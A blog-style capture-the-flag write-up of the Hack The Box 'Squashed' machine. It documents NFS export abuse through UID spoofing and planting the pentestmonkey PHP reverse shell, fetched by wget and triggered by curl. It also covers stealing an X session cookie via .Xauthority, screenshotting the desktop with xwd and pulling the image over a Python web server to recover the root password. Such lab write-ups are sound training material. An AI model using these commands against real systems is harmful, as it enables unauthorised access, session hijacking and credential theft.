Hello world and welcome to haxez and my write-up for the Squashed machine. I’ve been getting back into doing Hack The Box machines again. I’ve started studying for the CPTS and the CBBH and thought I would do some boxes to complement the academy courses.
Information Gathering
Once I started the box I started enumerating it with Nmap. I targeted all ports, ran safe checks, and asked for version information. From the scan, results came back showing that ports 22, 80, 111, and 2049 were open. This suggested that the box was a web server with a publically exposed NFS service.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 09:55 GMT
Nmap scan report for 10.129.228.109
Host is up (0.022s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 38714/udp6 mountd
| 100005 1,2,3 40865/tcp6 mountd
| 100005 1,2,3 48822/udp mountd
| 100005 1,2,3 59769/tcp mountd
| 100021 1,3,4 38567/tcp6 nlockmgr
| 100021 1,3,4 40531/tcp nlockmgr
| 100021 1,3,4 46286/udp nlockmgr
| 100021 1,3,4 53135/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40531/tcp open nlockmgr 1-4 (RPC #100021)
41359/tcp open mountd 1-3 (RPC #100005)
43719/tcp open mountd 1-3 (RPC #100005)
59769/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
Port 80 and nfs are open.
Network File System Enumeration
Rather than brute forcing SSH or checking out the website on port 80, I decided to check out the Network File System service. To do this, I used the showmount command and pointed it to the IP address of the machine. The results from Showmount suggested that there were 2 exports. One for a user called ross and one for the webserver.
┌─[[email protected]]─[~]
└──╼ $sudo showmount -e 10.129.228.109
Export list for 10.129.228.109:
/home/ross *
/var/www/html *
Squashed Foothold
In order to get a foothold on Squashed, I mounted the /var/www/html NFS export. Then, I listed the parent directory and got the user ID 2017.
┌─[[email protected]]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/var/www/html /mnt/www
┌─[[email protected]]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x 1 root root 4192 Mar 9 09:35 hgfs
drwxr-xr-x 14 1001 scanner 4096 Mar 9 09:19 ross
drwxr-xr-- 5 2017 www-data 4096 Mar 9 09:35 www
drwxr-xr-x 1 root root 262 Mar 8 09:31 ..
drwxr-xr-x 1 root root 22 Mar 9 09:35 .
I created my own user with that user ID and switched to it. I moved into the html directory and used wget to download a PHP reverse shell from the pentestmonkey GitHub page.
$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2023-03-09 09:39:25-- https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php 100%[============================================>] 5.36K --.-KB/s in 0s
2023-03-09 09:39:25 (57.3 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]After changing the IP in the reverse shell, I set up a netcat listener and used curl to trigger the shell.
┌─[[email protected]]─[~]
└──╼ $sudo curl http://10.129.228.109/php-reverse-shell.phpThis allowed me to get a shell on Squashed as the user alex. I upgraded my shell using the python stty trick and was able to capture the user flag.
Squashed Privilege Escalation
In order to elevate privileges on Squashed, I mounted the ross NFS export. Next, I created a user with the same user ID as ross, switched to it, and started looking around.
┌─[[email protected]]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/home/ross /mnt/ross
┌─[[email protected]]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x 1 root root 4192 Mar 9 10:11 hgfs
drwxr-xr-x 14 1001 scanner 4096 Mar 9 09:19 ross
drwxr-xr-- 5 htbs www-data 4096 Mar 9 10:10 www
drwxr-xr-x 1 root root 262 Mar 8 09:31 ..
drwxr-xr-x 1 root root 22 Mar 9 09:35 .
┌─[[email protected]]─[~]
└──╼ $sudo useradd htbross
┌─[[email protected]]─[~]
└──╼ $sudo usermod -u 1001 htbross
┌─[[email protected]]─[~]
└──╼ $sudo su htbross
$ ls -laSh /mnt/ross
total 64K
drwxr-xr-x 14 htbross scanner 4.0K Mar 9 09:19 .
drwx------ 11 htbross scanner 4.0K Oct 21 15:57 .cache
drwx------ 12 htbross scanner 4.0K Oct 21 15:57 .config
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Desktop
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Documents
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Downloads
drwx------ 3 htbross scanner 4.0K Oct 21 15:57 .gnupg
drwx------ 3 htbross scanner 4.0K Oct 21 15:57 .local
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Music
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Pictures
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Public
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Templates
drwxr-xr-x 2 htbross scanner 4.0K Oct 21 15:57 Videos
-rw------- 1 htbross scanner 2.5K Mar 9 09:19 .xsession-errors
-rw------- 1 htbross scanner 2.5K Dec 27 15:33 .xsession-errors.old
-rw------- 1 htbross scanner 57 Mar 9 09:19 .Xauthority
drwxr-xr-x 1 root root 22 Mar 9 09:35 ..
lrwxrwxrwx 1 root root 9 Oct 20 14:24 .bash_history -> /dev/null
lrwxrwxrwx 1 root root 9 Oct 21 14:07 .viminfo -> /dev/nullAt this point, I had no idea what I was looking for. Normally, I would just drop an SSH key in the authorized_keys file and SSH to the box. However, that wasn’t the way this box was intended to be completed. I resorted to looking at the official walkthrough and now the Xauthority file is a dead giveaway. You can look up what the file is for and what the presence of it suggests but to keep this short, it stores session tokens for X sessions. We can steal the token and use it to snoop on ross.
Cat the contents of the file and base64 encode it so it isn’t jibberish. Then save the output into the /tmp directory of Squashed via your reverse shell as alex.
$ cat /mnt/ross/.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��Ȃ���).S��P���$
cat /mnt/ross/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC
$ echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC | base64 -d > /tmp/.Xauthority
Then, as alex we can do some more enumeration and find out what the configuration of ross’s session is. You can just press w apparently and it will show you. Had no idea. The more you know.
[email protected]:/tmp$ w
w
10:26:43 up 1:07, 1 user, load average: 0.02, 0.02, 0.00
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
ross tty7 :0 09:19 1:07m 9.11s 0.05s /usr/libexec/gnome-session-binary --systemd --session=gnomeNow, this allows us to start taking screenshots of the desktop with the following command… cool.
xwd -root -screen -silent -display :0 > /tmp/screen.xwdThen, in order to access the screenshot we spin up a python web server and navigate to it and download it.
[email protected]:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [09/Mar/2023 10:33:30] code 404, message File not found
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.126 - - [09/Mar/2023 10:33:58] "GET /screen.xwd HTTP/1.1" 200 -Open the image, mine defaulted to gimp. I love gimp so no complaints. It looks like it is a password manager showing the root password.
Squashed root Flag
With the password for root we can simply switch to the root user and capture the root flag from the root directory. That completes the box.
$ su root
Password: cahxxxxxxxi9A
whoami
root
cat /root/root.txt
692xxxxxxxxxxxxxxxxb159cConclusion
This was a fun box with an interesting privilege escalation technique. The method of completing it was fairly easy in terms of ability provided you understand the files you see. LinEnum didn’t flag the file as a method for privilege escalation so I wouldn’t have had a clue without the walkthrough. The great thing about Hack The Box machines is that everyone teaches you something new.